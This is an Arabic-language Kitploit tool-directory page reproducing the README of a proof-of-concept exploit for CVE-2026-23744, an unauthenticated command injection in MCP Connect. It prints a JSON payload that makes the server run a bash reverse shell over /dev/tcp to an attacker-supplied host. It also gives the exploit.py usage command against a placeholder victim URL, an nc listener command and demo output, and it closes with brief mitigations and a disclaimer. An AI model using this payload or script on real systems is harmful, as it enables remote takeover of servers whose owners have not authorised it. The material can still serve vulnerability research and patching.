Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-23744 — إثبات مفهوم لاستغلال CVE-2026-23744، وهو حقن أوامر غير مصادق عليه في MCP Connect يؤدي إلى تنفيذ تعليمات برمجية عن بُعد وفتح قشرة عكسية. | Kitploit
أدوات/GitHubGitHub/cylock11/cve-2026-23744
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمر
GitHubcylock11/cve-2026-23744

CVE-2026-23744

إثبات مفهوم لاستغلال CVE-2026-23744، وهو حقن أوامر غير مصادق عليه في MCP Connect يؤدي إلى تنفيذ تعليمات برمجية عن بُعد وفتح قشرة عكسية.

عرض المستودع
منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-23744 — MCP Connect RCE عبر حقن أوامر غير مصادق عليه

Python Category Type License

⚠️ إخلاء مسؤولية: هذا المستودع مخصص لأغراض تعليمية وبحثية في مجال الأمن فقط. استخدام هذا الاستغلال ضد أنظمة دون إذن صريح يعد غير قانوني. لا يتحمل المؤلف أي مسؤولية عن سوء استخدام هذا الكود.


📌 وصف الثغرة

تقع الثغرة في نقطة النهاية /api/mcp/connect، والتي تسمح لمهاجم غير مصادق عليه بتسجيل خادم MCP (بروتوكول سياق النموذج) عشوائي مع إعدادات خبيثة. نظرًا لعدم وجود تحقق أو تنقية لحقل command ووسائطه args، فمن الممكن حقن أوامر نظام التشغيل التي يتم تنفيذها مباشرة على الخادم بصلاحيات عملية الويب.

يؤدي هذا إلى تنفيذ كود عن بُعد (RCE) يمكن استغلاله للحصول على على النظام المخترق.

قشرة عكسية

🧠 التفاصيل التقنية

الحقلالتفاصيل
النوعتنفيذ كود عن بُعد (RCE)
الناقلشبكة (HTTP POST بدون مصادقة)
نقطة النهاية/api/mcp/connect
الخطورة🔴 حرجة
المصادقةغير مطلوبة
التأثيرسيطرة كاملة على الخادم

الحمولة الخبيثة

root@kitploit:~
{
  "serverId": "shell1",
  "serverConfig": {
    "command": "bash",
    "args": ["-c", "bash -i >& /dev/tcp/<LHOST>/443 0>&1"],
    "env": {}
  }
}

يعالج الخادم هذا الإعداد ويستدعي الأمر bash مع الوسائط المقدمة، مما ينشئ اتصال TCP عكسيًا نحو المهاجم.


🛠️ المتطلبات

  • Python 3.x
  • المكتبات التالية:
root@kitploit:~
pip install requests termcolor

🚀 الاستخدام

root@kitploit:~
python3 exploit.py -l <عنوان_IP_الخاص_بك> -u <عنوان_URL_الهدف>

المعاملات

المعاملالوصفمثال
-lعنوان IP الخاص بك (حيث ستستقبل القشرة)192.168.1.50
-uعنوان URL الأساسي للهدفhttps://victim.com

مثال كامل

الطرفية 1 — المستمع:

root@kitploit:~
nc -nlvp 443

الطرفية 2 — الاستغلال:

root@kitploit:~
python3 exploit.py -l 192.168.1.50 -u https://victim.com

🎬 العرض التوضيحي

root@kitploit:~
[-] Please, execute the following command in another terminal:

[+] nc -nlvp 443

[-] Press 'Enter' when the command has been executed...

[+] Sending attack request...

بمجرد إرسال الطلب، سيستقبل المستمع على المنفذ 443 الاتصال العكسي مع قشرة تفاعلية من الخادم المخترق.


🛡️ التخفيف

  • التحقق من وتنقية جميع حقول الجسم في /api/mcp/connect قبل معالجتها.
  • مصادقة نقطة النهاية وتقييد الوصول إليها للمستخدمين المصرح لهم فقط.
  • عدم تنفيذ أوامر النظام مباشرة من مدخلات المستخدم.
  • تنفيذ قائمة بيضاء للأوامر المسموح بها.
  • تطبيق مبدأ الحد الأدنى من الامتيازات على عملية خادم الويب.

📁 هيكل المستودع

root@kitploit:~
.
├── exploit.py       # السكربت الرئيسي للاستغلال
└── README.md        # هذا الملف

👤 المؤلف

تم تطويره لأغراض البحث في الأمن الهجومي بواسطة Jorge Arana Fedriani.

تنزيل الأداة